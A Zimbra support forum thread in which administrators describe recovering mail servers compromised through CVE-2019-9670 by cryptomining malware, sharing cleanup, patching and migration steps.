CVE-2019-9670 being actively exploited (Hacked Server)

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
phoenix
Ambassador
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

How about the info in this thread: viewtopic.php?f=15&t=66546
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
Toru
Posts: 7
Joined: Mon Jan 15, 2018 12:44 pm

Re: CVE-2019-9670 being actively exploited

Post by Toru »

Bill, thanks for the answer!

By thet time I didn’t have zmcpustater and zmcpustat files on my server.
I have earlier rbuild my crontab of Zimbra user like describe in this instructions https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
And this file include onnly a legal line:

Code: Select all

# Run zmgsaupdate util to trickeSync galsync accounts
#
 49 0 * * 7    /opt/zimbra/libexec/zmgsaupdate > /dev/null 2>&1
But all the same, I commented it out. (doubt it was a necessary step :) )

Memkesed I previously transferred to a localhost. Now i make change, and add lines to iptables.

Let's look at the result a little time later.
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Post by mqaroush »

How can prevent Autodiscover

Code: Select all

[root@xxx tmp]# cat /opt/zimbra/log/access_log.2019-07-09 | grep pyth
113.196.70.24 -  -  [10/Jul/2019:02:29:55 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 85

phoenix
Ambassador
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

mqaroush wrote:How can prevent Autodiscover
Why, do you think it's a problem or is it causing you a problem?
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

I've been actively fighting an infection on an 8.6, patch 14 install - have followed the steps outlined and keep having this thing coming back.

Yesterday we had zmcpustat appear again. stopped the process, cleaned it, deleted the file, created a temp file with the same name, locked it using chattr, cleaned the crontab and today I've got zmiostat using up 1200% of the cpu...

we are migrating everything over to a new box (time consuming as we've got 300+ mailboxes and 3 TB of data) running 8.8, but in the meantime they still seem to be getting in on the old server...
rodrigoferra
Posts: 18
Joined: Thu Jul 11, 2019 11:11 am

Re: CVE-2019-9670 being actively exploited

Post by rodrigoferra »

Two days ago I was attacked by this bitcoin stuff.

Did every step necessary, patched the software, followed a lot of instructions... Currently, my zmopendkimctl is not running and the zmconfigd always seems to fail on start but later it's working.

First-time I'm facing something like this.

Best regard´s!
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

so the last attempt (yesterday) put a fake zmiostat into /tmp...

again cleaned that, created dummy file with the same name and them used chattr to lock it...

reset all zimbra passwords...

so far it's been clean through the night - but then we were also clear for close to a month after doing patch 14 and it then returned...

best bet as far as I can tell is still to build a new server and migrate everything over...

does anyone out there have a way to migrate contact data? (address, phone etc) - all the built in tools that I've seen don't allow access to that and I'm hesitant to start playing with the Ldap directly....
phoenix
Ambassador
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

You can move all your current data and config to a new server with the ZeXtras Migration Tool, take a look at that.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

"You can move all your current data and config to a new server with the ZeXtras Migration Tool, take a look at that."

the problem with that approach is that we've got way too much data and mailboxes to get it done quick enough. We are a 24/7 shop and any email downtime affects the bottom line...

the approach we ended up taking (since we were also migrating versions and core os) was to setup the new server, extract mailbox info, signatures etc - import back onto the new server, bring it online and now with the old server offline (but accessible so that staff can view old emails/contacts until their mailbox is queued to be imported) are exporting mailbox data and importing it back in batches...

all the scripts/tools that I've been using have worked very well - with the exception of the contact info - which for some reason I can't fathom - there are no cli tools to permit anyone to access,export or import....
rodrigoferra
Posts: 18
Joined: Thu Jul 11, 2019 11:11 am

Re: CVE-2019-9670 being actively exploited

Post by rodrigoferra »

My currently situation is that everything seems to be back to normal.

- Applied the pacth 14;
- Searched for the files, found one file called Docs.js with some injection code on it, cleanned;
- A problem with DKIM and ipv6 after the patch;
- Renew all the keys and passwords.

The opendkim issue I solved with the link: https://sebastian.marsching.com/blog/ar ... erver.html

I installed the fail2ban too, too many tries at my postfix via SASL and renew the zimbra keys. My server is extremely closed now.
Post Reply